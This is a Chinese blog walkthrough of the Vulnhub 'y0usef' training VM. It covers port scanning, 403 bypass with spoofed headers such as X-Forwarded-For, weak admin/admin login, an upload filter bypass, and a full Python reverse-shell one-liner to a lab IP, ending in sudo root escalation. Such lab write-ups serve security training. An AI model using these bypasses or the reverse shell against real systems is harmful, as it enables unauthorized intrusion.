y0usef(vulnhub)

最新推荐文章于 2024-08-08 23:50:54 发布
最新推荐文章于 2024-08-08 23:50:54 发布
阅读量651 收藏
点赞数 1
CC 4.0 BY-SA版权
分类专栏: Vulnhub靶场 文章标签: linux 安全 网络
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/wcl20010/article/details/124645354
本文介绍了在Vulnhub平台上的Y0usef靶场的渗透测试过程,包括主机发现、端口扫描、漏洞发现及利用,如403权限绕过和弱口令攻击。作者通过端口扫描发现OpenSSH和Apache服务,并使用whatweb和dirsearch工具进行漏洞挖掘,最终成功绕过403禁止并获取了管理员权限。此外,文章还提到了文件上传的技巧和反弹shell的方法,最终通过SSH访问并找到flag。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

y0usef(vulnhub)

难度不高,学习到的知识很基础
https://www.vulnhub.com/entry/y0usef-1,624/

目录

1.主机发现
arp-scan -l
2.端口扫描
nmap -p 1-65535 -A 192.168.56.107  -A 强力扫描 直接能发现服务
22/tcp open  ssh     OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.13 (Ubuntu Linux; protocol 2.0)

80/tcp open  http    Apache httpd 2.4.10 ((Ubuntu))
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: Apache/2.4.10 (Ubuntu)

OS details: Linux 3.2 - 4.9
3.漏洞发现

进入网页,没有什么信息,直接上工具,使用whatweb和dirsearch。

whatweb  http://192.168.56.107
 
Apache[2.4.10], Bootstrap, Country[RESERVED][ZZ], HTTPServer[Ubuntu Linux][Apache/2.4.10 (Ubuntu)], IP[192.168.56.107], JQuery, PHP[5.5.9-1ubuntu4.29], Script, X-Powered-By[PHP/5.5.9-1ubuntu4.29]

dirsearch -u IP
301 /adminstration  ->  http://192.168.56.107/adminstration/

访问抓包看看。
请添加图片描述

403就该放弃了吗?继续尝试!

403Bypass利用方法
1. 旁站绕过的方式:
HOST可以更改,使用域内的主机名,说不定能够绕过

2. 通过覆盖URL:
GET /adminstration/ HTTP/1.1
Host: 192.168.56.107
--》把这个修改成
GET / HTTP/1.1    这里换成根路径
//X-Original-URL:/adminstration   这里换成要访问的   头部还有
//X-Rewrite-URL:/adminstration    把url重写成要访问的url

3.通过请求头的方法:
GET /adminstration/ HTTP/1.1
Host: 192.168.56.107 
--》
GET /adminstration/ HTTP/1.1
Host: 192.168.56.107 
Referer:https://192.168.56.107/adminstration

4.X开头的HTTP头部
X-Originating-IP:127.0.0.1
X-Remote-IP:127.0.0.1
X-forwarded-For127.0.0.1

尝试尝试请添加图片描述
然后你会发现进去了,但是尝试输入账号时,还会403。。所以每次都得加上头部信息。

居然就是弱口令admin,admin。
请添加图片描述

然后点点页面。还是得加上X-Forwarded-For:127.0.0.1,有个文件上传。

在这里插入图片描述

简单说一下绕过的基本方法:

文件扩展名
Content-Type:image/png  jpeg  都尝试下
代码内容中添加GIF89a或者PNG

这里文件上传使用image/png就行了
在这里插入图片描述

上传成功去链接:地址就是再上传点URL直接拼接。
在这里插入图片描述

打开虚拟终端。查找下存在不存在python环境,可以尝试反弹shell.不反弹也可以,蚁剑上可以正常使用,如果想要反弹shell的话可以使用python代码

python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.56.102",6666));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

在这里插入图片描述

那就去看看文件,查看下flag,但是突然觉得这不只是flag,还可能是base64加密的

解密得到信息

ssh : 
user : yousef 
pass : yousef123

在这里插入图片描述

4.提权

在这里插入图片描述
登录后看看信息:发现了sudo-l可以,还是ALL
在这里插入图片描述
直接sudo su或者sudo -s 切换到root身份
在这里插入图片描述

Y0usef打靶记录
wwd180的博客
06-15 388
实验主机:攻击机kali(192.168.3.131)靶机y0usef(192.168.3.99)实验目标:获取root权限 + flag实验网络:桥接。
VnlnHub y0usef
weixin_45682839的博客
09-11 979
涉及知识包括:端口服务探测、铭感目录搜集、WEB信息收集、403frobidden bypass绕过、弱口令爆破、文件上传及绕过、本地提权等
Y0usef
qq_47078547的博客
06-15 280
实验主机:Os-Y0usef 靶机一台/Kali linux攻击机一台实验网络:桥接网络实验目标:获取靶机的Root权限 得到flag难易程度:简单。
vulnhub--y0usef
weixin_45922278的博客
02-01 472
y0usef 一、信息收集 1.namp扫描: 发现开了http、ssh服务。 访问192.168.0.101:80。网页为空。 2.御剑后台扫描: ./adminstration 目录较为特殊 403 :服务器理解客户的请求,但拒绝处理它,通常由于服务器上文件或目录的权限设置导致的WEB访问错误。 二、尝试越权 1.X-Forwarded-For: 头部带上x-forwarded-for:127.0.0.1,伪装成本地访问。 2.burp暴力破解: 带上头
Vulnhub_y0usef
qq_45434762的博客
01-12 530
发现目标主机使用nmap扫描整个网段,发现目标主机nmap 192.168.1.0/24 通过简单的扫描发现目标主机开放了22和80端口使用nmap再对目标主机进行详细的探测,发现任然只...
打靶记录8——y0usef
Fab1an的博客
08-08 1000
主机发现,端口扫描针对Web服务进行信息收集,查看源码,爆破路径针对的路径进行403 Bypass绕过目标服务器的检查和限制,成功访问到这个URL发现后台登录的页面存在弱口令发现文件上传漏洞,通过绕过目标服务器对文件上传的过滤机制利用上传的Webshell进行反弹shell,提权发现yousef账号,通过第一个flag获得SSH登录账号密码登录yousef账号后,发现它的sudo配置文件不严导致可以直接提权,切换成root账号。
Capacity mismatch for disk D:\xuniji\baji\y0usef\\y0usef-disk1.vmdk。
04-28
"Capacity mismatch for disk D:\xuniji\baji\y0usef\y0usef-disk1.vmdk" 是一个错误提示,意味着磁盘容量不匹配。这通常发生在虚拟机或虚拟磁盘的配置中。 可能的原因是,虚拟磁盘文件的容量与虚拟机配置中指定的...
y0usef.ova 靶机怎么用kali打
最新发布
12-07
y0usef.ova 靶机是一种用于渗透测试和网络安全学习的虚拟环境。以下是使用Kali Linux攻击y0usef.ova 靶机的步骤: 1. **下载和导入y0usef.ova**: - 从官方网站或可信来源下载y0usef.ova文件。 - 使用VirtualBox...
VnlnHub-y0usef 1 靶场 打靶记录
lcc001114的博客
06-15 266
发现提权的命令都可以用!那这就简单了,直接用一个我经常用的sudo su命令进行提权。登录成功之后查看了各种可能藏flag的目录并未发现信息,查看root目录时提示说没有权限。上传php文件修改content-type为image/png(这个图没截上,用的别人的,改成下面框选的就行。尝试上传一个png文件,发现上传成功,服务器只允许上传png文件,我们看能否进行绕过。连接成功,打开蚁剑的虚拟终端,并在home目录下发现了第一个flag。那这就涉及到提权的操作了,sudo -l查看有哪些能用的提权命令。
渗透测试学习笔记lab1【y0usef
铃的杂货铺分铺
09-27 1866
第一周, y0usef靶机的渗透学习笔记
vulnhub靶场-y0usef
qq_42947816的博客
03-08 1416
Vulnhub旨在提供环境,让任何人都能在数字安全、计算机软件和网络管理方面获得实际的“实践”经验。
VulnHub之y0usef靶场(1)
p_utao的博客
02-08 583
场信息: 地址:https://www.vulnhub.com/entry/y0usef-1,624/ 发布日期:2020年12月10日 难度:简单 目标:user.txt和root.txt 运行:VirtualBox(网络桥接) 信息收集 Web 服务器: Apache 2.4.10 编程语言: PHP 5.5.9 操作系统: Ubuntu nmap扫描一下 nmap 192.168.1.0/24 Nmap scan report for 192.168.1.50 Host is u
vulnhub靶机--y0usef(难度:easy)
weixin_46107179的博客
04-20 2286
靶机下载地址:下载链接 主机发现 通过arp-scan -l扫描得到靶机的IP地址为10.0.2.4 信息搜集 通过nmap扫描,可以得到靶机只开启了22,80端口(ssh,Apache服务) 打开浏览器访问,发现这个站点还在建设中,但是服务器在运行中 尝试了robots.txt,发现没有该文件,查看源代码也没有什么发现,于是,再用dirsearch扫描一下目录,发现基本上是403,可能权限不够,访问其他200的响应码发现与开始的主页面一样 但是还有一个adminstration的目录,进行访问,结
y0usef靶场详解
weixin_44681307的博客
07-16 816
靶机感悟:对于这个靶机并没有太多的难点,也没有的别多的绊子,就是猜测下一步是什么,耐心的去思考怎么才能进行到下一步。这样再访问我们就可以看到登陆框了,账户密码都是admin,随便试一试就出来密码了,也可以尝试爆破密码。在home目录下发现一个user.txt,里面是base64编码,这个看多了,一眼就知道是base64。就像这样,我这里反弹shell的ip地址写错了,重新修改了一下,发送后就上传成功了。发现有所有权限,直接su - 提权就可以了,很简单的一个靶机,跟CTF似的。抓包,在包头加上这个就可以。
Vulnhub靶机y0usef渗透
xingjinhao123的博客
03-01 4692
靶机介绍
【每日打靶练习】Vulnhub--y0usef()
leo788的博客
01-05 269
本靶机主要是对于web应用中可能存在的403forbidden进行绕过达到访问控制的失效,其次是对于文件上传漏洞的利用,文件上传有很多种方式,这里并没有详述,只对修改文件格式进行了试验,成功上传后,使用蚁剑对于上传PHP木马进行后门访问来达到获取权限的目的。
实战打靶集锦-028-y0usef
阿尔泰野狼的博客
03-25 1885
本文简要描述了博主的一次打靶经历,中间涉及403 forbidden绕过、上传文件格式检查绕过、php构建反弹shell、CVE-2015-1328提权等。
Vulnhub靶机实战-Y0USEF-1
黑白的博客
01-10 1103
声明 好好学习,天天向上 搭建 Y0USEF: 1,vulnhub官网下载完镜像后,最开始搭建时,导入vmware屡屡出错,改了ovftool,以及各种配置还是无法导入,最后下载Oracle VM Virtrualbox,导入到这个里面,网络设置成桥接网卡,可以正常使用 渗透 存活扫描 nmap -sP 192.168.31.1/24 端口扫描 nmap -T4 -A 192.168.31.232 -p 1-65535 -oN nmap.A 发现开启22和80,看看80的http 访问80,啥都没有
vulnhub-y0usef
m0_62008601的博客
09-18 529
简单的渗透练习
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值